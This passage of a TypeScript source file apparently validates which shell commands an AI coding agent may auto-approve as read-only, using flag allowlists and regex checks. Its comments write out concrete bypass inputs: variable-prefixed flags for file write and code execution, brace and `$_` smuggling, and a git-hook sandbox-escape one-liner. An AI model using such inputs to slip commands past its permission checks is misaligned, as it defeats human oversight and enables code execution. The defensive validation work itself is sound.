1039 } else { 1040 if (DANGEROUS_CAPABILITIES.has(token)) return true 1041 i++ 1042 } 1043 } 1044 return false 1045 }, 1046 }, 1047 1048 // ss — socket statistics (iproute2). Read-only query tool equivalent to netstat. 1049 // SECURITY: -K/--kill (forcibly close sockets) and -D/--diag (dump raw data to file) 1050 // are deliberately excluded. -F/--filter (read filter from file) also excluded. 1051 ss: { 1052 safeFlags: { 1053 '-h': 'none', 1054 '--help': 'none', 1055 '-V': 'none', 1056 '--version': 'none', 1057 '-n': 'none', 1058 '--numeric': 'none', 1059 '-r': 'none', 1060 '--resolve': 'none', 1061 '-a': 'none', 1062 '--all': 'none', 1063 '-l': 'none', 1064 '--listening': 'none', 1065 '-o': 'none', 1066 '--options': 'none', 1067 '-e': 'none', 1068 '--extended': 'none', 1069 '-m': 'none', 1070 '--memory': 'none', 1071 '-p': 'none', 1072 '--processes': 'none', 1073 '-i': 'none', 1074 '--info': 'none', 1075 '-s': 'none', 1076 '--summary': 'none', 1077 '-4': 'none', 1078 '--ipv4': 'none', 1079 '-6': 'none', 1080 '--ipv6': 'none', 1081 '-0': 'none', 1082 '--packet': 'none', 1083 '-t': 'none', 1084 '--tcp': 'none', 1085 '-M': 'none', 1086 '--mptcp': 'none', 1087 '-S': 'none', 1088 '--sctp': 'none', 1089 '-u': 'none', 1090 '--udp': 'none', 1091 '-d': 'none', 1092 '--dccp': 'none', 1093 '-w': 'none', 1094 '--raw': 'none', 1095 '-x': 'none', 1096 '--unix': 'none', 1097 '--tipc': 'none', 1098 '--vsock': 'none', 1099 '-f': 'string', 1100 '--family': 'string', 1101 '-A': 'string', 1102 '--query': 'string', 1103 '--socket': 'string', 1104 '-Z': 'none', 1105 '--context': 'none', 1106 '-z': 'none', 1107 '--contexts': 'none', 1108 // SECURITY: -N/--net EXCLUDED — performs setns(), unshare(), mount(), umount() 1109 // to switch network namespace. While isolated to forked process, too invasive. 1110 '-b': 'none', 1111 '--bpf': 'none', 1112 '-E': 'none', 1113 '--events': 'none', 1114 '-H': 'none', 1115 '--no-header': 'none', 1116 '-O': 'none', 1117 '--oneline': 'none', 1118 '--tipcinfo': 'none', 1119 '--tos': 'none', 1120 '--cgroup': 'none', 1121 '--inet-sockopt': 'none', 1122 // SECURITY: -K/--kill EXCLUDED — forcibly closes sockets 1123 // SECURITY: -D/--diag EXCLUDED — dumps raw TCP data to a file 1124 // SECURITY: -F/--filter EXCLUDED — reads filter expressions from a file 1125 }, 1126 }, 1127 1128 // fd/fdfind — fast file finder (fd-find). Read-only search tool. 1129 // SECURITY: -x/--exec (execute command per result) and -X/--exec-batch 1130 // (execute command with all results) are deliberately excluded. 1131 fd: { safeFlags: { ...FD_SAFE_FLAGS } }, 1132 // fdfind is the Debian/Ubuntu package name for fd — same binary, same flags 1133 fdfind: { safeFlags: { ...FD_SAFE_FLAGS } }, 1134 1135 ...PYRIGHT_READ_ONLY_COMMANDS, 1136 ...DOCKER_READ_ONLY_COMMANDS, 1137 } 1138 1139 // gh commands are ant-only since they make network requests, which goes against 1140 // the read-only validation principle of no network access 1141 const ANT_ONLY_COMMAND_ALLOWLIST: Record<string, CommandConfig> = { 1142 // All gh read-only commands from shared validation map 1143 ...GH_READ_ONLY_COMMANDS, 1144 // aki — Anthropic internal knowledge-base search CLI. 1145 // Network read-only (same policy as gh). --audit-csv omitted: writes to disk. 1146 aki: { 1147 safeFlags: { 1148 '-h': 'none', 1149 '--help': 'none', 1150 '-k': 'none', 1151 '--keyword': 'none', 1152 '-s': 'none', 1153 '--semantic': 'none', 1154 '--no-adaptive': 'none', 1155 '-n': 'number', 1156 '--limit': 'number', 1157 '-o': 'number', 1158 '--offset': 'number', 1159 '--source': 'string', 1160 '--exclude-source': 'string', 1161 '-a': 'string', 1162 '--after': 'string', 1163 '-b': 'string', 1164 '--before': 'string', 1165 '--collection': 'string', 1166 '--drive': 'string', 1167 '--folder': 'string', 1168 '--descendants': 'none', 1169 '-m': 'string', 1170 '--meta': 'string', 1171 '-t': 'string', 1172 '--threshold': 'string', 1173 '--kw-weight': 'string', 1174 '--sem-weight': 'string', 1175 '-j': 'none', 1176 '--json': 'none', 1177 '-c': 'none', 1178 '--chunk': 'none', 1179 '--preview': 'none', 1180 '-d': 'none', 1181 '--full-doc': 'none', 1182 '-v': 'none', 1183 '--verbose': 'none', 1184 '--stats': 'none', 1185 '-S': 'number', 1186 '--summarize': 'number', 1187 '--explain': 'none', 1188 '--examine': 'string', 1189 '--url': 'string', 1190 '--multi-turn': 'number', 1191 '--multi-turn-model': 'string', 1192 '--multi-turn-context': 'string', 1193 '--no-rerank': 'none', 1194 '--audit': 'none', 1195 '--local': 'none', 1196 '--staging': 'none', 1197 }, 1198 }, 1199 } 1200 1201 function getCommandAllowlist(): Record<string, CommandConfig> { 1202 let allowlist: Record<string, CommandConfig> = COMMAND_ALLOWLIST 1203 // On Windows, xargs can be used as a data-to-code bridge: if a file contains 1204 // a UNC path, `cat file | xargs cat` feeds that path to cat, triggering SMB 1205 // resolution. Since the UNC path is in file contents (not the command string), 1206 // regex-based detection cannot catch this. 1207 if (getPlatform() === 'windows') { 1208 const { xargs: _, ...rest } = allowlist 1209 allowlist = rest 1210 } 1211 if (process.env.USER_TYPE === 'ant') { 1212 return { ...allowlist, ...ANT_ONLY_COMMAND_ALLOWLIST } 1213 } 1214 return allowlist 1215 } 1216 1217 /** 1218 * Commands that are safe to use as xargs targets for auto-approval. 1219 * 1220 * SECURITY: Only add a command to this list if it has NO flags that can: 1221 * 1. Write to files (e.g., find's -fprint, sed's -i) 1222 * 2. Execute code (e.g., find's -exec, awk's system(), perl's -e) 1223 * 3. Make network requests 1224 * 1225 * These commands must be purely read-only utilities. When xargs uses one of 1226 * these as a target, we stop validating flags after the target command 1227 * (see the `break` in isCommandSafeViaFlagParsing), so the command itself 1228 * must not have ANY dangerous flags, not just a safe subset. 1229 * 1230 * Each command was verified by checking its man page for dangerous capabilities. 1231 */ 1232 const SAFE_TARGET_COMMANDS_FOR_XARGS = [ 1233 'echo', // Output only, no dangerous flags 1234 'printf', // xargs runs /usr/bin/printf (binary), not bash builtin — no -v support 1235 'wc', // Read-only counting, no dangerous flags 1236 'grep', // Read-only search, no dangerous flags 1237 'head', // Read-only, no dangerous flags 1238 'tail', // Read-only (including -f follow), no dangerous flags 1239 ] 1240 1241 /** 1242 * Unified command validation function that replaces individual validator functions. 1243 * Uses declarative configuration from COMMAND_ALLOWLIST to validate commands and their flags. 1244 * Handles combined flags, argument validation, and shell quoting bypass detection. 1245 */ 1246 export function isCommandSafeViaFlagParsing(command: string): boolean { 1247 // Parse the command to get individual tokens using shell-quote for accuracy 1248 // Handle glob operators by converting them to strings, they don't matter from the perspective 1249 // of this function 1250 const parseResult = tryParseShellCommand(command, env => `$${env}`) 1251 if (!parseResult.success) return false 1252 1253 const parsed = parseResult.tokens.map(token => { 1254 if (typeof token !== 'string') { 1255 token = token as { op: 'glob'; pattern: string } 1256 if (token.op === 'glob') { 1257 return token.pattern 1258 } 1259 } 1260 return token 1261 }) 1262 1263 // If there are operators (pipes, redirects, etc.), it's not a simple command. 1264 // Breaking commands down into their constituent parts is handled upstream of 1265 // this function, so we reject anything with operators here. 1266 const hasOperators = parsed.some(token => typeof token !== 'string') 1267 if (hasOperators) { 1268 return false 1269 } 1270 1271 // Now we know all tokens are strings 1272 const tokens = parsed as string[] 1273 1274 if (tokens.length === 0) { 1275 return false 1276 } 1277 1278 // Find matching command configuration 1279 let commandConfig: CommandConfig | undefined 1280 let commandTokens: number = 0 1281 1282 // Check for multi-word commands first (e.g., "git diff", "git stash list") 1283 const allowlist = getCommandAllowlist() 1284 for (const [cmdPattern] of Object.entries(allowlist)) { 1285 const cmdTokens = cmdPattern.split(' ') 1286 if (tokens.length >= cmdTokens.length) { 1287 let matches = true 1288 for (let i = 0; i < cmdTokens.length; i++) { 1289 if (tokens[i] !== cmdTokens[i]) { 1290 matches = false 1291 break 1292 } 1293 } 1294 if (matches) { 1295 commandConfig = allowlist[cmdPattern] 1296 commandTokens = cmdTokens.length 1297 break 1298 } 1299 } 1300 } 1301 1302 if (!commandConfig) { 1303 return false // Command not in allowlist 1304 } 1305 1306 // Special handling for git ls-remote to reject URLs that could lead to data exfiltration 1307 if (tokens[0] === 'git' && tokens[1] === 'ls-remote') { 1308 // Check if any argument looks like a URL or remote specification 1309 for (let i = 2; i < tokens.length; i++) { 1310 const token = tokens[i] 1311 if (token && !token.startsWith('-')) { 1312 // Reject HTTP/HTTPS URLs 1313 if (token.includes('://')) { 1314 return false 1315 } 1316 // Reject SSH URLs like git@github.com:user/repo.git 1317 if (token.includes('@') || token.includes(':')) { 1318 return false 1319 } 1320 // Reject variable references 1321 if (token.includes('$')) { 1322 return false 1323 } 1324 } 1325 } 1326 } 1327 1328 // SECURITY: Reject ANY token containing `$` (variable expansion). The 1329 // `env => \`$${env}\`` callback at line 825 preserves `$VAR` as LITERAL TEXT 1330 // in tokens, but bash expands it at runtime (unset vars → empty string). 1331 // This parser differential defeats BOTH validateFlags and callbacks: 1332 // 1333 // (1) `$VAR`-prefix defeats validateFlags `startsWith('-')` check: 1334 // `git diff "$Z--output=/tmp/pwned"` → token `$Z--output=/tmp/pwned` 1335 // (starts with `$`) falls through as positional at ~:1730. Bash runs 1336 // `git diff --output=/tmp/pwned`. ARBITRARY FILE WRITE, zero perms. 1337 // 1338 // (2) `$VAR`-prefix → RCE via `rg --pre`: 1339 // `rg . "$Z--pre=bash" FILE` → executes `bash FILE`. rg's config has 1340 // no regex and no callback. SINGLE-STEP ARBITRARY CODE EXECUTION. 1341 // 1342 // (3) `$VAR`-infix defeats additionalCommandIsDangerousCallback regex: 1343 // `ps ax"$Z"e` → token `ax$Ze`. The ps callback regex 1344 // `/^[a-zA-Z]*e[a-zA-Z]*$/` fails on `$` → "not dangerous". Bash runs 1345 // `ps axe` → env vars for all processes. A fix limited to `$`-PREFIXED 1346 // tokens would NOT close this. 1347 // 1348 // We check ALL tokens after the command prefix. Any `$` means we cannot 1349 // determine the runtime token value, so we cannot verify read-only safety. 1350 // This check must run BEFORE validateFlags and BEFORE callbacks. 1351 for (let i = commandTokens; i < tokens.length; i++) { 1352 const token = tokens[i] 1353 if (!token) continue 1354 // Reject any token containing $ (variable expansion) 1355 if (token.includes('$')) { 1356 return false 1357 } 1358 // Reject tokens with BOTH `{` and `,` (brace expansion obfuscation). 1359 // `git diff {@'{'0},--output=/tmp/pwned}` → shell-quote strips quotes 1360 // → token `{@{0},--output=/tmp/pwned}` has `{` + `,` → brace expansion. 1361 // This is defense-in-depth with validateBraceExpansion in bashSecurity.ts. 1362 // We require BOTH `{` and `,` to avoid false positives on legitimate 1363 // patterns: `stash@{0}` (git ref, has `{` no `,`), `{{.State}}` (Go 1364 // template, no `,`), `prefix-{}-suffix` (xargs, no `,`). Sequence form 1365 // `{1..5}` also needs checking (has `{` + `..`). 1366 if (token.includes('{') && (token.includes(',') || token.includes('..'))) { 1367 return false 1368 } 1369 } 1370 1371 // Validate flags starting after the command tokens 1372 if ( 1373 !validateFlags(tokens, commandTokens, commandConfig, { 1374 commandName: tokens[0], 1375 rawCommand: command, 1376 xargsTargetCommands: 1377 tokens[0] === 'xargs' ? SAFE_TARGET_COMMANDS_FOR_XARGS : undefined, 1378 }) 1379 ) { 1380 return false 1381 } 1382 1383 if (commandConfig.regex && !commandConfig.regex.test(command)) { 1384 return false 1385 } 1386 if (!commandConfig.regex && /`/.test(command)) { 1387 return false 1388 } 1389 // Block newlines and carriage returns in grep/rg patterns as they can be used for injection 1390 if ( 1391 !commandConfig.regex && 1392 (tokens[0] === 'rg' || tokens[0] === 'grep') && 1393 /[\n\r]/.test(command) 1394 ) { 1395 return false 1396 } 1397 if ( 1398 commandConfig.additionalCommandIsDangerousCallback && 1399 commandConfig.additionalCommandIsDangerousCallback( 1400 command, 1401 tokens.slice(commandTokens), 1402 ) 1403 ) { 1404 return false 1405 } 1406 1407 return true 1408 } 1409 1410 /** 1411 * Creates a regex pattern that matches safe invocations of a command. 1412 * 1413 * The regex ensures commands are invoked safely by blocking: 1414 * - Shell metacharacters that could lead to command injection or redirection 1415 * - Command substitution via backticks or $() 1416 * - Variable expansion that could contain malicious payloads 1417 * - Environment variable assignment bypasses (command=value) 1418 * 1419 * @param command The command name (e.g., 'date', 'npm list', 'ip addr') 1420 * @returns RegExp that matches safe invocations of the command 1421 */ 1422 function makeRegexForSafeCommand(command: string): RegExp { 1423 // Create regex pattern: /^command(?:\s|$)[^<>()$`|{}&;\n\r]*$/ 1424 return new RegExp(`^${command}(?:\\s|$)[^<>()$\`|{}&;\\n\\r]*$`) 1425 } 1426 1427 // Simple commands that are safe for execution (converted to regex patterns using makeRegexForSafeCommand) 1428 // WARNING: If you are adding new commands here, be very careful to ensure 1429 // they are truly safe. This includes ensuring: 1430 // 1. That they don't have any flags that allow file writing or command execution 1431 // 2. Use makeRegexForSafeCommand() to ensure proper regex pattern creation 1432 const READONLY_COMMANDS = [ 1433 // Cross-platform commands from shared validation 1434 ...EXTERNAL_READONLY_COMMANDS, 1435 1436 // Unix/bash-specific read-only commands (not shared because they don't exist in PowerShell) 1437 1438 // Time and date 1439 'cal', 1440 'uptime', 1441 1442 // File content viewing (relative paths handled separately) 1443 'cat', 1444 'head', 1445 'tail', 1446 'wc', 1447 'stat', 1448 'strings', 1449 'hexdump', 1450 'od', 1451 'nl', 1452 1453 // System info 1454 'id', 1455 'uname', 1456 'free', 1457 'df', 1458 'du', 1459 'locale', 1460 'groups', 1461 'nproc', 1462 1463 // Path information 1464 'basename', 1465 'dirname', 1466 'realpath', 1467 1468 // Text processing 1469 'cut', 1470 'paste', 1471 'tr', 1472 'column', 1473 'tac', // Reverse cat — displays file contents in reverse line order 1474 'rev', // Reverse characters in each line 1475 'fold', // Wrap lines to specified width 1476 'expand', // Convert tabs to spaces 1477 'unexpand', // Convert spaces to tabs 1478 'fmt', // Simple text formatter — output to stdout only 1479 'comm', // Compare sorted files line by line 1480 'cmp', // Byte-by-byte file comparison 1481 'numfmt', // Number format conversion 1482 1483 // Path information (additional) 1484 'readlink', // Resolve symlinks — displays target of symbolic link 1485 1486 // File comparison 1487 'diff', 1488 1489 // true and false, used to silence or create errors 1490 'true', 1491 'false', 1492 1493 // Misc. safe commands 1494 'sleep', 1495 'which', 1496 'type', 1497 'expr', // Evaluate expressions (arithmetic, string matching) 1498 'test', // Conditional evaluation (file checks, comparisons) 1499 'getconf', // Get system configuration values 1500 'seq', // Generate number sequences 1501 'tsort', // Topological sort 1502 'pr', // Paginate files for printing 1503 ] 1504 1505 // Complex commands that require custom regex patterns 1506 // Warning: If possible, avoid adding new regexes here and prefer using COMMAND_ALLOWLIST 1507 // instead. This allowlist-based approach to CLI flags is more secure and avoids 1508 // vulns coming from gnu getopt_long. 1509 const READONLY_COMMAND_REGEXES = new Set([ 1510 // Convert simple commands to regex patterns using makeRegexForSafeCommand 1511 ...READONLY_COMMANDS.map(makeRegexForSafeCommand), 1512 1513 // Echo that doesn't execute commands or use variables 1514 // Allow newlines in single quotes (safe) but not in double quotes (could be dangerous with variable expansion) 1515 // Also allow optional 2>&1 stderr redirection at the end 1516 /^echo(?:\s+(?:'[^']*'|"[^"$<>\n\r]*"|[^|;&`$(){}><#\\!"'\s]+))*(?:\s+2>&1)?\s*$/, 1517 1518 // Claude CLI help 1519 /^claude -h$/, 1520 /^claude --help$/, 1521 1522 // Git readonly commands are now handled via COMMAND_ALLOWLIST with explicit flag validation 1523 // (git status, git blame, git ls-files, git config --get, git remote, git tag, git branch) 1524 1525 /^uniq(?:\s+(?:-[a-zA-Z]+|--[a-zA-Z-]+(?:=\S+)?|-[fsw]\s+\d+))*(?:\s|$)\s*$/, // Only allow flags, no input/output files 1526 1527 // System info 1528 /^pwd$/, 1529 /^whoami$/, 1530 // env and printenv removed - could expose sensitive environment variables 1531 1532 // Development tools version checking - exact match only, no suffix allowed. 1533 // SECURITY: `node -v --run <task>` would execute package.json scripts because 1534 // Node processes --run before -v. Python/python3 --version are also anchored 1535 // for defense-in-depth. These were previously in EXTERNAL_READONLY_COMMANDS which 1536 // flows through makeRegexForSafeCommand and permits arbitrary suffixes. 1537 /^node -v$/, 1538 /^node --version$/, 1539 /^python --version$/, 1540 /^python3 --version$/, 1541 1542 // Misc. safe commands 1543 // tree command moved to COMMAND_ALLOWLIST for proper flag validation (blocks -o/--output) 1544 /^history(?:\s+\d+)?\s*$/, // Only allow bare history or history with numeric argument - prevents file writing 1545 /^alias$/, 1546 /^arch(?:\s+(?:--help|-h))?\s*$/, // Only allow arch with help flags or no arguments 1547 1548 // Network commands - only allow exact commands with no arguments to prevent network manipulation 1549 /^ip addr$/, // Only allow "ip addr" with no additional arguments 1550 /^ifconfig(?:\s+[a-zA-Z][a-zA-Z0-9_-]*)?\s*$/, // Allow ifconfig with interface name only (must start with letter) 1551 1552 // JSON processing with jq - allow with inline filters and file arguments 1553 // File arguments are validated separately by pathValidation.ts 1554 // Allow pipes and complex expressions within quotes but prevent dangerous flags 1555 // Block command substitution - backticks are dangerous even in single quotes for jq 1556 // Block -f/--from-file, --rawfile, --slurpfile (read files into jq), --run-tests, -L/--library-path (load executable modules) 1557 // Block 'env' builtin and '$ENV' object which can access environment variables (defense in depth) 1558 /^jq(?!\s+.*(?:-f\b|--from-file|--rawfile|--slurpfile|--run-tests|-L\b|--library-path|\benv\b|\$ENV\b))(?:\s+(?:-[a-zA-Z]+|--[a-zA-Z-]+(?:=\S+)?))*(?:\s+'[^'`]*'|\s+"[^"`]*"|\s+[^-\s'"][^\s]*)+\s*$/, 1559 1560 // Path commands (path validation ensures they're allowed) 1561 // cd command - allows changing to directories 1562 /^cd(?:\s+(?:'[^']*'|"[^"]*"|[^\s;|&`$(){}><#\\]+))?$/, 1563 // ls command - allows listing directories 1564 /^ls(?:\s+[^<>()$`|{}&;\n\r]*)?$/, 1565 // find command - blocks dangerous flags 1566 // Allow escaped parentheses \( and \) for grouping, but block unescaped ones 1567 // NOTE: \\[()] must come BEFORE the character class to ensure \( is matched as an escaped paren, 1568 // not as backslash + paren (which would fail since paren is excluded from the character class) 1569 /^find(?:\s+(?:\\[()]|(?!-delete\b|-exec\b|-execdir\b|-ok\b|-okdir\b|-fprint0?\b|-fls\b|-fprintf\b)[^<>()$`|{}&;\n\r\s]|\s)+)?$/, 1570 ]) 1571 1572 /** 1573 * Checks if a command contains glob characters (?, *, [, ]) or expandable `$` 1574 * variables OUTSIDE the quote contexts where bash would treat them as literal. 1575 * These could expand to bypass our regex-based security checks. 1576 * 1577 * Glob examples: 1578 * - `python *` could expand to `python --help` if a file named `--help` exists 1579 * - `find ./ -?xec` could expand to `find ./ -exec` if such a file exists 1580 * Globs are literal inside BOTH single and double quotes. 1581 * 1582 * Variable expansion examples: 1583 * - `uniq --skip-chars=0$_` → `$_` expands to last arg of previous command; 1584 * with IFS word splitting, this smuggles positional args past "flags-only" 1585 * regexes. `echo " /etc/passwd /tmp/x"; uniq --skip-chars=0$_` → FILE WRITE. 1586 * - `cd "$HOME"` → double-quoted `$HOME` expands at runtime. 1587 * Variables are literal ONLY inside single quotes; they expand inside double 1588 * quotes and unquoted. 1589 * 1590 * The `$` check guards the READONLY_COMMAND_REGEXES fallback path. The `$` 1591 * token check in isCommandSafeViaFlagParsing only covers COMMAND_ALLOWLIST 1592 * commands; hand-written regexes like uniq's `\S+` and cd's `"[^"]*"` allow `$`. 1593 * Matches `$` followed by `[A-Za-z_@*#?!$0-9-]` covering `$VAR`, `$_`, `$@`, 1594 * `$*`, `$#`, `$?`, `$!`, `$$`, `$-`, `$0`-`$9`. Does NOT match `${` or `$(` — 1595 * those are caught by COMMAND_SUBSTITUTION_PATTERNS in bashSecurity.ts. 1596 * 1597 * @param command The command string to check 1598 * @returns true if the command contains unquoted glob or expandable `$` 1599 */ 1600 function containsUnquotedExpansion(command: string): boolean { 1601 // Track quote state to avoid false positives for patterns inside quoted strings 1602 let inSingleQuote = false 1603 let inDoubleQuote = false 1604 let escaped = false 1605 1606 for (let i = 0; i < command.length; i++) { 1607 const currentChar = command[i] 1608 1609 // Handle escape sequences 1610 if (escaped) { 1611 escaped = false 1612 continue 1613 } 1614 1615 // SECURITY: Only treat backslash as escape OUTSIDE single quotes. In bash, 1616 // `\` inside `'...'` is LITERAL — it does not escape the next character. 1617 // Without this guard, `'\'` desyncs the quote tracker: the `\` sets 1618 // escaped=true, then the closing `'` is consumed by the escaped-skip 1619 // instead of toggling inSingleQuote. Parser stays in single-quote 1620 // mode for the rest of the command, missing ALL subsequent expansions. 1621 // Example: `ls '\' *` — bash sees glob `*`, but desynced parser thinks 1622 // `*` is inside quotes → returns false (glob NOT detected). 1623 // Defense-in-depth: hasShellQuoteSingleQuoteBug catches `'\'` patterns 1624 // before this function is reached, but we fix the tracker anyway for 1625 // consistency with the correct implementations in bashSecurity.ts. 1626 if (currentChar === '\\' && !inSingleQuote) { 1627 escaped = true 1628 continue 1629 } 1630 1631 // Update quote state 1632 if (currentChar === "'" && !inDoubleQuote) { 1633 inSingleQuote = !inSingleQuote 1634 continue 1635 } 1636 1637 if (currentChar === '"' && !inSingleQuote) { 1638 inDoubleQuote = !inDoubleQuote 1639 continue 1640 } 1641 1642 // Inside single quotes: everything is literal. Skip. 1643 if (inSingleQuote) { 1644 continue 1645 } 1646 1647 // Check `$` followed by variable-name or special-parameter character. 1648 // `$` expands inside double quotes AND unquoted (only SQ makes it literal). 1649 if (currentChar === '$') { 1650 const next = command[i + 1] 1651 if (next && /[A-Za-z_@*#?!$0-9-]/.test(next)) { 1652 return true 1653 } 1654 } 1655 1656 // Globs are literal inside double quotes too. Only check unquoted. 1657 if (inDoubleQuote) { 1658 continue 1659 } 1660 1661 // Check for glob characters outside all quotes. 1662 // These could expand to anything, including dangerous flags. 1663 if (currentChar && /[?*[\]]/.test(currentChar)) { 1664 return true 1665 } 1666 } 1667 1668 return false 1669 } 1670 1671 /** 1672 * Checks if a single command string is read-only based on READONLY_COMMAND_REGEXES. 1673 * Internal helper function that validates individual commands. 1674 * 1675 * @param command The command string to check 1676 * @returns true if the command is read-only 1677 */ 1678 function isCommandReadOnly(command: string): boolean { 1679 // Handle common stderr-to-stdout redirection pattern 1680 // This handles both "command 2>&1" at the end of a full command 1681 // and "command 2>&1" as part of a pipeline component 1682 let testCommand = command.trim() 1683 if (testCommand.endsWith(' 2>&1')) { 1684 // Remove the stderr redirection for pattern matching 1685 testCommand = testCommand.slice(0, -5).trim() 1686 } 1687 1688 // Check for Windows UNC paths that could be vulnerable to WebDAV attacks 1689 // Do this early to prevent any command with UNC paths from being marked as read-only 1690 if (containsVulnerableUncPath(testCommand)) { 1691 return false 1692 } 1693 1694 // Check for unquoted glob characters and expandable `$` variables that could 1695 // bypass our regex-based security checks. We can't know what these expand to 1696 // at runtime, so we can't verify the command is read-only. 1697 // 1698 // Globs: `python *` could expand to `python --help` if such a file exists. 1699 // 1700 // Variables: `uniq --skip-chars=0$_` — bash expands `$_` at runtime to the 1701 // last arg of the previous command. With IFS word splitting, this smuggles 1702 // positional args past "flags-only" regexes like uniq's `\S+`. The `$` token 1703 // check inside isCommandSafeViaFlagParsing only covers COMMAND_ALLOWLIST 1704 // commands; hand-written regexes in READONLY_COMMAND_REGEXES (uniq, jq, cd) 1705 // have no such guard. See containsUnquotedExpansion for full analysis. 1706 if (containsUnquotedExpansion(testCommand)) { 1707 return false 1708 } 1709 1710 // Tools like git allow `--upload-pack=cmd` to be abbreviated as `--up=cmd` 1711 // Regex filters can be bypassed, so we use strict allowlist validation instead. 1712 // This requires defining a set of known safe flags. Claude can help with this, 1713 // but please look over it to ensure it didn't add any flags that allow file writes 1714 // code execution, or network requests. 1715 if (isCommandSafeViaFlagParsing(testCommand)) { 1716 return true 1717 } 1718 1719 for (const regex of READONLY_COMMAND_REGEXES) { 1720 if (regex.test(testCommand)) { 1721 // Prevent git commands with -c flag to avoid config options that can lead to code execution 1722 // The -c flag allows setting arbitrary git config values inline, including dangerous ones like 1723 // core.fsmonitor, diff.external, core.gitProxy, etc. that can execute arbitrary commands 1724 // Check for -c preceded by whitespace and followed by whitespace or equals 1725 // Using regex to catch spaces, tabs, and other whitespace (not part of other flags like --cached) 1726 if (testCommand.includes('git') && /\s-c[\s=]/.test(testCommand)) { 1727 return false 1728 } 1729 1730 // Prevent git commands with --exec-path flag to avoid path manipulation that can lead to code execution 1731 // The --exec-path flag allows overriding the directory where git looks for executables 1732 if ( 1733 testCommand.includes('git') && 1734 /\s--exec-path[\s=]/.test(testCommand) 1735 ) { 1736 return false 1737 } 1738 1739 // Prevent git commands with --config-env flag to avoid config injection via environment variables 1740 // The --config-env flag allows setting git config values from environment variables, which can be 1741 // just as dangerous as -c flag (e.g., core.fsmonitor, diff.external, core.gitProxy) 1742 if ( 1743 testCommand.includes('git') && 1744 /\s--config-env[\s=]/.test(testCommand) 1745 ) { 1746 return false 1747 } 1748 return true 1749 } 1750 } 1751 return false 1752 } 1753 1754 /** 1755 * Checks if a compound command contains any git command. 1756 * 1757 * @param command The full command string to check 1758 * @returns true if any subcommand is a git command 1759 */ 1760 function commandHasAnyGit(command: string): boolean { 1761 return splitCommand_DEPRECATED(command).some(subcmd => 1762 isNormalizedGitCommand(subcmd.trim()), 1763 ) 1764 } 1765 1766 /** 1767 * Git-internal path patterns that can be exploited for sandbox escape. 1768 * If a command creates these files and then runs git, the git command 1769 * could execute malicious hooks from the created files. 1770 */ 1771 const GIT_INTERNAL_PATTERNS = [ 1772 /^HEAD$/, 1773 /^objects(?:\/|$)/, 1774 /^refs(?:\/|$)/, 1775 /^hooks(?:\/|$)/, 1776 ] 1777 1778 /** 1779 * Checks if a path is a git-internal path (HEAD, objects/, refs/, hooks/). 1780 */ 1781 function isGitInternalPath(path: string): boolean { 1782 // Normalize path by removing leading ./ or / 1783 const normalized = path.replace(/^\.?\//, '') 1784 return GIT_INTERNAL_PATTERNS.some(pattern => pattern.test(normalized)) 1785 } 1786 1787 // Commands that only delete or modify in-place (don't create new files at new paths) 1788 const NON_CREATING_WRITE_COMMANDS = new Set(['rm', 'rmdir', 'sed']) 1789 1790 /** 1791 * Extracts write paths from a subcommand using PATH_EXTRACTORS. 1792 * Only returns paths for commands that can create new files/directories 1793 * (write/create operations excluding deletion and in-place modification). 1794 */ 1795 function extractWritePathsFromSubcommand(subcommand: string): string[] { 1796 const parseResult = tryParseShellCommand(subcommand, env => `$${env}`) 1797 if (!parseResult.success) return [] 1798 1799 const tokens = parseResult.tokens.filter( 1800 (t): t is string => typeof t === 'string', 1801 ) 1802 if (tokens.length === 0) return [] 1803 1804 const baseCmd = tokens[0] 1805 if (!baseCmd) return [] 1806 1807 // Only consider commands that can create files at target paths 1808 if (!(baseCmd in COMMAND_OPERATION_TYPE)) { 1809 return [] 1810 } 1811 const opType = COMMAND_OPERATION_TYPE[baseCmd as PathCommand] 1812 if ( 1813 (opType !== 'write' && opType !== 'create') || 1814 NON_CREATING_WRITE_COMMANDS.has(baseCmd) 1815 ) { 1816 return [] 1817 } 1818 1819 const extractor = PATH_EXTRACTORS[baseCmd as PathCommand] 1820 if (!extractor) return [] 1821 1822 return extractor(tokens.slice(1)) 1823 } 1824 1825 /** 1826 * Checks if a compound command writes to any git-internal paths. 1827 * This is used to detect potential sandbox escape attacks where a command 1828 * creates git-internal files (HEAD, objects/, refs/, hooks/) and then runs git. 1829 * 1830 * SECURITY: A compound command could bypass the bare repo detection by: 1831 * 1. Creating bare git repo files (HEAD, objects/, refs/, hooks/) in the same command 1832 * 2. Then running git, which would execute malicious hooks 1833 * 1834 * Example attack: 1835 * mkdir -p objects refs hooks && echo '#!/bin/bash\nmalicious' > hooks/pre-commit && touch HEAD && git status 1836 * 1837 * @param command The full command string to check 1838 * @returns true if any subcommand writes to git-internal paths 1839 */ 1840 function commandWritesToGitInternalPaths(command: string): boolean { 1841 const subcommands = splitCommand_DEPRECATED(command) 1842 1843 for (const subcmd of subcommands) { 1844 const trimmed = subcmd.trim() 1845 1846 // Check write paths from path-based commands (mkdir, touch, cp, mv) 1847 const writePaths = extractWritePathsFromSubcommand(trimmed) 1848 for (const path of writePaths) { 1849 if (isGitInternalPath(path)) { 1850 return true 1851 } 1852 } 1853 1854 // Check output redirections (e.g., echo x > hooks/pre-commit) 1855 const { redirections } = extractOutputRedirections(trimmed) 1856 for (const { target } of redirections) { 1857 if (isGitInternalPath(target)) { 1858 return true 1859 } 1860 } 1861 } 1862 1863 return false 1864 } 1865 1866 /** 1867 * Checks read-only constraints for bash commands. 1868 * This is the single exported function that validates whether a command is read-only. 1869 * It handles compound commands, sandbox mode, and safety checks. 1870 * 1871 * @param input The bash command input to validate 1872 * @param compoundCommandHasCd Pre-computed flag indicating if any cd command exists in the compound command. 1873 * This is computed by commandHasAnyCd() and passed in to avoid duplicate computation. 1874 * @returns PermissionResult indicating whether the command is read-only 1875 */ 1876 export function checkReadOnlyConstraints( 1877 input: z.infer<typeof BashTool.inputSchema>, 1878 compoundCommandHasCd: boolean, 1879 ): PermissionResult { 1880 const { command } = input 1881 1882 // Detect if the command is not parseable and return early 1883 const result = tryParseShellCommand(command, env => `$${env}`) 1884 if (!result.success) { 1885 return { 1886 behavior: 'passthrough', 1887 message: 'Command cannot be parsed, requires further permission checks', 1888 } 1889 } 1890 1891 // Check the original command for safety before splitting 1892 // This is important because splitCommand_DEPRECATED may transform the command 1893 // (e.g., ${VAR} becomes $VAR) 1894 if (bashCommandIsSafe_DEPRECATED(command).behavior !== 'passthrough') { 1895 return { 1896 behavior: 'passthrough', 1897 message: 'Command is not read-only, requires further permission checks', 1898 } 1899 } 1900 1901 // Check for Windows UNC paths in the original 